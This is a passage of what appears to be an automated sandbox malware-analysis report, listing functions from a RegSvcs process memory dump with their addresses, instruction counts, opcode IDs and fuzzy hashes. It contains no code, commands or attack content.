                                                        • Opcode Fuzzy Hash: 67edd7190d05653a7d8a1c83615253c8d533b6b11070529a377c45c84d0bc549
                                                        • Instruction Fuzzy Hash: A941B171A00B129FE725CF28CC80A22B7F9FF89314B109A6DE55787A51E774E846CF94
                                                        Function 0164A470 Relevance: .1, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6d7c56a50e0c9bd8a3d761890e6814c00644f15faee4f84cf2c48b5aa08e31d9
                                                        • Instruction ID: 5b4c180df1d423c97980fff2f149e09a96127b557f4ba7df3f17d527d33f0c76
                                                        • Opcode Fuzzy Hash: 6d7c56a50e0c9bd8a3d761890e6814c00644f15faee4f84cf2c48b5aa08e31d9
                                                        • Instruction Fuzzy Hash: 2541FF32A81205DFDB25DFACCD94BED7BB5FB58320F084269D412AB381DB349901CBA4
                                                        Function 01628BF0 Relevance: .1, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 300b131e7f6212a12d03df04e72d32f44bef4fb2d664948d856cc7d5ed10728a
                                                        • Instruction ID: ec21cdcb056093aae703c357e254329e75f9597c5a9313efcd2af16283f319ef
                                                        • Opcode Fuzzy Hash: 300b131e7f6212a12d03df04e72d32f44bef4fb2d664948d856cc7d5ed10728a
                                                        • Instruction Fuzzy Hash: 6141DF72A00622CBD7249F5CCC80A5ABBFAFBA4724F18812ED9029B755C735D842CF90
                                                        Function 01618918 Relevance: .1, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f3b670c542dd9c16feb753a68fffcffc7656df14dee663e611ff66082b696dc5
                                                        • Instruction ID: eed63c97f479120a3b8808949c2461c1922cfb4ce5fcab775067d38fcfb91f5a
                                                        • Opcode Fuzzy Hash: f3b670c542dd9c16feb753a68fffcffc7656df14dee663e611ff66082b696dc5
                                                        • Instruction Fuzzy Hash: 73414A315087469FD312DF698C40A6BF6EAAF88B54F44092EF984D7260E730DE058B97
                                                        Function 0161A020 Relevance: .1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                        • Instruction ID: 0844a7421833c86ad8d050fce86df3b885f42fe530ab56a9ad8da3bb56859624
                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                        • Instruction Fuzzy Hash: A9415F31A01251DFDB11DEAD8C407BABB72EB50B5AF19C06AE945DB348D73B8D81CB90
                                                        Function 016209AD Relevance: .1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b150b869fea92d453e767372cf638832c9dfd1a05b88e31cb7633b2b09becb2
                                                        • Instruction ID: 0729c1b29939c8e640f8ef217244bd7623c4eb5658521eb1ace73691983ba782
                                                        • Opcode Fuzzy Hash: 2b150b869fea92d453e767372cf638832c9dfd1a05b88e31cb7633b2b09becb2
                                                        • Instruction Fuzzy Hash: 0F416671A01A11EFD721CF18C840B26BBF5FF58314F608A6EE8498B352E771E9428F95
                                                        Function 01650710 Relevance: .1, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                        • Instruction ID: 1068def3f057096b09278aee1d5b27fd1b2447a05ed7d3d2e1ddf821e431ff9b
                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                        • Instruction Fuzzy Hash: 1B413875A00605EFDB64CF98C990AAABBF9FF18704F10496DE996D7250D330EA44CF90
                                                        Function 0162262C Relevance: .1, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 295daa34aacd39af1e2bef6d3e13baaafc1cbf2fb53953a91dc27deea1688aae
                                                        • Instruction ID: 75b5cf8c37c3ec9a2e3c2d918f8561f1bcb17c05c80ab3a99d8c9da22cff3c71
                                                        • Opcode Fuzzy Hash: 295daa34aacd39af1e2bef6d3e13baaafc1cbf2fb53953a91dc27deea1688aae
                                                        • Instruction Fuzzy Hash: 4941AEB1505B21DFCB21EF28CD60B69B7B2FF54720F1086ADD8169B2A1DB70A941CF51
                                                        Function 0165C8F9 Relevance: .1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0017a4b130fda84d7e8a68ae37694ed02993f58196ff6f3d90ab208ea9a0315b
                                                        • Instruction ID: 44aa2dd131f4e88e03fb1c697b26cf297931704e3ea2d744d4d24723e323433f
                                                        • Opcode Fuzzy Hash: 0017a4b130fda84d7e8a68ae37694ed02993f58196ff6f3d90ab208ea9a0315b
                                                        • Instruction Fuzzy Hash: A63188B1A01349DFDB52CF68C840B99BBF9EF49724F2085AED519EB251D3329902CB94
                                                        Function 016A07C3 Relevance: .1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7c9799d43313690d2b4a4cde230d6bd2abb5075d1f1132632d167288ccc58b9
                                                        • Instruction ID: dac2e5b8d0e04bd0f82df28e8de953bedeac4abd5b65221bbbc7b58648668e3e
                                                        • Opcode Fuzzy Hash: a7c9799d43313690d2b4a4cde230d6bd2abb5075d1f1132632d167288ccc58b9
                                                        • Instruction Fuzzy Hash: B941AE729043019BD760DF28C845B9BBBE8FF88724F008A2EF998C7250D770D805CB96
                                                        Function 016180A0 Relevance: .1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc0f685c67238c431522b34a120768b230f8215306e50f8100db57e8846742fc
                                                        • Instruction ID: 719e2d1566a1b65463b461793b843483c640a4aedac7fca62eb276a20985f1a9
                                                        • Opcode Fuzzy Hash: dc0f685c67238c431522b34a120768b230f8215306e50f8100db57e8846742fc
                                                        • Instruction Fuzzy Hash: EF41E372E05617AFDB01DF18CC81AA8B7BAFF54761F288629D815A7384D734ED418BD0
                                                        Function 016A05A7 Relevance: .1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6156731f5860058f4477628e8d838e54d5542ed14ccff9719b3801dfa11fa744
                                                        • Instruction ID: 4b9a3aa0d8b46dbe77809868935034c6363748da0286c4f0a89662d4e70862a0
                                                        • Opcode Fuzzy Hash: 6156731f5860058f4477628e8d838e54d5542ed14ccff9719b3801dfa11fa744
                                                        • Instruction Fuzzy Hash: A841B1726046529FC320DF68CC40A6AB7E9BFC8700F54461DF99597780E730ED14CBAA
                                                        Function 01624859 Relevance: .1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4aefd5009d045e3c4c784acc8faa964ccb87d51744996b19423adae096c8516
                                                        • Instruction ID: cf087c688850b717beaede68892443661fede14c47912aea0cdf78c39a99dfda
                                                        • Opcode Fuzzy Hash: e4aefd5009d045e3c4c784acc8faa964ccb87d51744996b19423adae096c8516
                                                        • Instruction Fuzzy Hash: 9F41BE30B047228BD725DF2CDC94B2ABBAAEF80360F14442DE6468B391DB70D951CF91
                                                        Function 01618B50 Relevance: .1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e7a44aace2a44bca98a2a5e1dc5137c95469a60b942c7c0ff87a3d6ea624ca26
                                                        • Instruction ID: 2f18c1de59b34d8bf90bb1b262051ddf31d543d1c7dd4bc55c976985e4e801ac
                                                        • Opcode Fuzzy Hash: e7a44aace2a44bca98a2a5e1dc5137c95469a60b942c7c0ff87a3d6ea624ca26
                                                        • Instruction Fuzzy Hash: C0418071A01615CFCB15DF69CD8099DBBF6FF98320B28862ED466A7354DB349941CB40
                                                        Function 016302E1 Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                        • Instruction ID: 8caf8dc511a1e38541fa7dfd065d81431d807dce477a0d50be68b73db6989f1c
                                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                        • Instruction Fuzzy Hash: C2314631A04246AFEB129B6CCC80B9BBFF9AF54310F0441A9F855D7342C7B4D888CBA4
                                                        Function 016CE3DB Relevance: .1, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e8afb8873556c7e702c830b0b4ba296b45627c5a6704078485a5a48a030be4a
                                                        • Instruction ID: dd64349d0caed86904edce6c04eaa622ad0046229f04f569065d4b685e329979
                                                        • Opcode Fuzzy Hash: 6e8afb8873556c7e702c830b0b4ba296b45627c5a6704078485a5a48a030be4a
                                                        • Instruction Fuzzy Hash: 3E31B431741716ABD722AF658C40FBFBAB9EB59F50F00402CF600AB381CAA5DC0187E4
                                                        Function 016D4B4B Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86eaa421ac9e3e8799389e66366cb6703fd3670b8817a404f65a1010afcf578b
                                                        • Instruction ID: 16aaa8faa1d1aea3cc58b81f874d7da63ff1d099cdfb1fa44080ec8194032444
                                                        • Opcode Fuzzy Hash: 86eaa421ac9e3e8799389e66366cb6703fd3670b8817a404f65a1010afcf578b
                                                        • Instruction Fuzzy Hash: B3319E32A052018FC721DF1DDC80E66B7E6FB85360F0A846EF9958BB51DB71AC41CB95
                                                        Function 01624260 Relevance: .1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 564ebf085ce4ba27262bcbf9a5e1fd7397d9f0fa7d4369129baa45617b114ad7
                                                        • Instruction ID: 74750071f425ef9aecc4398bc2d66cdbaa3da26e72d57ebfc0b99691f60fe2be
                                                        • Opcode Fuzzy Hash: 564ebf085ce4ba27262bcbf9a5e1fd7397d9f0fa7d4369129baa45617b114ad7
                                                        • Instruction Fuzzy Hash: 5C418D31200B45DFD722DF29CC91BD67BE9BB45354F01892DE65A8B350CBB4E804CB94
                                                        Function 016D4BB0 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 34dfc8b1f1515a3b65b106f17a28e2274bd7531152c2ab8e4d23ba6f7432ae71
                                                        • Instruction ID: 41eb58a2667daf629cfa0e023e6807732ca4fc2d31e0f50b8e3dc6046a3187cc
                                                        • Opcode Fuzzy Hash: 34dfc8b1f1515a3b65b106f17a28e2274bd7531152c2ab8e4d23ba6f7432ae71
                                                        • Instruction Fuzzy Hash: F6318B71A052019FD720DF2CCC90A2AB7E5FB84720F09896DF9959BB91EB30ED05CB95
                                                        Function 0169EB1D Relevance: .1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce064cf4eb2fadec36df5c6da094f999d009109d2c6173fd0e5eb263746c6f0e
                                                        • Instruction ID: 95dd422d1a47ba60c41d2b5b88f67f51accf841c31d19ddf12a0c531881f39f0
                                                        • Opcode Fuzzy Hash: ce064cf4eb2fadec36df5c6da094f999d009109d2c6173fd0e5eb263746c6f0e
                                                        • Instruction Fuzzy Hash: F031B0326016C2DBFB22D75CCE48B257BDDBB40B44F1D04A4AA859B7D2DB29D841C224
                                                        Function 016E61C3 Relevance: .1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dcfb0d3c110c2898f4a4f9bca96a708d0050e2556dd3eaaddb87d6c431a0901c
                                                        • Instruction ID: c927dc34d287a3c555bbf09f6b3fd80a28a5bbd268155951213f515984f8eef9
                                                        • Opcode Fuzzy Hash: dcfb0d3c110c2898f4a4f9bca96a708d0050e2556dd3eaaddb87d6c431a0901c
                                                        • Instruction Fuzzy Hash: 7931B275A01116AFDB15DF98CC44BAEB7FAEB48740F458268E900AB244D770ED01CBA4
                                                        Function 016C483A Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41a79a709443bd6d40331dbc60baa6d8b813b259efd070afb59261cfca126dc9
                                                        • Instruction ID: d83bec19bca9aa13012b0bcd80bda2d15b7c7692c3947a70a9ac02d2a8c80319
                                                        • Opcode Fuzzy Hash: 41a79a709443bd6d40331dbc60baa6d8b813b259efd070afb59261cfca126dc9
                                                        • Instruction Fuzzy Hash: 92315576A4012DABCB21DF54DC94BDE7BFAEB98750F1040A9E508A7250CB30DE51CF90
                                                        Function 0164EB20 Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 89e7cd7a2b28c292eed6ea769e5ebbd557efb5b244dbcd251cc0c54575b5e576
                                                        • Instruction ID: c2bfe59dba533d21182ae14abbffcdabc98b9b293a333781376faeaef9a9b128
                                                        • Opcode Fuzzy Hash: 89e7cd7a2b28c292eed6ea769e5ebbd557efb5b244dbcd251cc0c54575b5e576
                                                        • Instruction Fuzzy Hash: 0931E432E00215AFDB21DFA9CD40AAEBBF9FF44350F018569E516E7250D3759E008BA0
                                                        Function 016E60B8 Relevance: .1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05413f600c0b52243eaba28093e6e57160bb4f386eb136c5561659168f1717b8
                                                        • Instruction ID: 1771533ac17e135ad0b2101b4777c00ac6907058b0725253bf676d99adc7484b
                                                        • Opcode Fuzzy Hash: 05413f600c0b52243eaba28093e6e57160bb4f386eb136c5561659168f1717b8
                                                        • Instruction Fuzzy Hash: 0D31F471A41202EBDB139FADCC50BAABBFAAF94315F00416DE506EB342DB30DD018B90
                                                        Function 016207AF Relevance: .1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 37f9a75b6176df277eacf3e6b5c0f5227c39b61af9d00be966552e9816f557cf
                                                        • Instruction ID: 025d8f037d074657ae46b306b25f0794ec87e2f898655cf1318c2294146f5397
                                                        • Opcode Fuzzy Hash: 37f9a75b6176df277eacf3e6b5c0f5227c39b61af9d00be966552e9816f557cf
                                                        • Instruction Fuzzy Hash: E831F976A04B22DBCB12DE288C80D6BBBA6AFD4650F03456DFD5697310DB74DC018BD5
                                                        Function 01628550 Relevance: .1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d60f9cd1ba1287a0548df9aff1123ae6a31dea7a22ff4d935019214f4df484a
                                                        • Instruction ID: e1e3c87b75115056d321253340ccafa3bd20a708a3899729c2a5d1e8b2ca9c27
                                                        • Opcode Fuzzy Hash: 9d60f9cd1ba1287a0548df9aff1123ae6a31dea7a22ff4d935019214f4df484a
                                                        • Instruction Fuzzy Hash: 3831AFB26097118FE761DF19CC40B2BBBE9FB88700F044A6DE984A7351D770E844CBA2
                                                        Function 0165A6C7 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                        • Instruction ID: 1400c53ce238a1056cab4ee0124ec31983b74f318bca9abbb178aacbac95d32b
                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                        • Instruction Fuzzy Hash: 8C312CB6B00B01AFD761CFA9DE40B67BBF8AB08650F04052DA99AC3751E730E9008B64
                                                        Function 016CEBD0 Relevance: .1, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 674e458083563a9a59bc472bc413d6e51baa9db6661c6c83e9f51ac1b14c82df
                                                        • Instruction ID: 4842cbb18445357c1fa97985701e9418a8ada24d8f1bfdf01c1cc0fbc67819ac
                                                        • Opcode Fuzzy Hash: 674e458083563a9a59bc472bc413d6e51baa9db6661c6c83e9f51ac1b14c82df
                                                        • Instruction Fuzzy Hash: F2318BB16093418FCB11DF1DC95086ABFF1FF89A18F4449AEE4989B351D332D945CB92
                                                        Function 0164438F Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4afcabe0914f63e1f5a413dec380eaae1fab19ad0409d5c0e1f5a3a5b44972b
                                                        • Instruction ID: 4e05626720fd501fe8059d65100ab2abbdc88bdf5e68500c5d90fd9d3ebd3af6
                                                        • Opcode Fuzzy Hash: e4afcabe0914f63e1f5a413dec380eaae1fab19ad0409d5c0e1f5a3a5b44972b
                                                        • Instruction Fuzzy Hash: 3C31D472B012059FD724EFA9CD82B6EBBFAEB84704F008529D545D7255DB30D946CB90
                                                        Function 0161CB7E Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                        • Instruction ID: 02d137a258adfe2932184f44b648cfcfaea614ee8782c4890b7341cee038cf92
                                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                        • Instruction Fuzzy Hash: 56210436E4125AAADB10DFB98C01BAFBBB6AF54750F098175AE15E7340E370CD0187A0
                                                        Function 0161C156 Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abd289ab789f0db6e10146df8c77246c5c898c265c38d05cc9e47f7adca789b4
                                                        • Instruction ID: 0a82c6eb385a871c417d51834242b035fe52aa7aeba680439fb735dc546217a2
                                                        • Opcode Fuzzy Hash: abd289ab789f0db6e10146df8c77246c5c898c265c38d05cc9e47f7adca789b4
                                                        • Instruction Fuzzy Hash: 563170715002118BD731AF5CCC41B79B7B5EF80314F44C5ADD9459B386DB74D982CB94
                                                        Function 016DC3CD Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                        • Instruction ID: a820a597d640a7f53d6cb0e4240e455a0ac22bc1bc21b112a596527a0edf2762
                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                        • Instruction Fuzzy Hash: 6A213D36A0065AB7CB15ABA98C00ABFBBBBEF40710F40801EFA9587691E734D940C764
                                                        Function 0161E420 Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 53975987bcb28be558850320974a13dcd3741c749e6333d667f4499652305c58
                                                        • Instruction ID: 37897260943f305677c6f83828d2b4d443e896e605a63fdebbce9cfa9fb86cdf
                                                        • Opcode Fuzzy Hash: 53975987bcb28be558850320974a13dcd3741c749e6333d667f4499652305c58
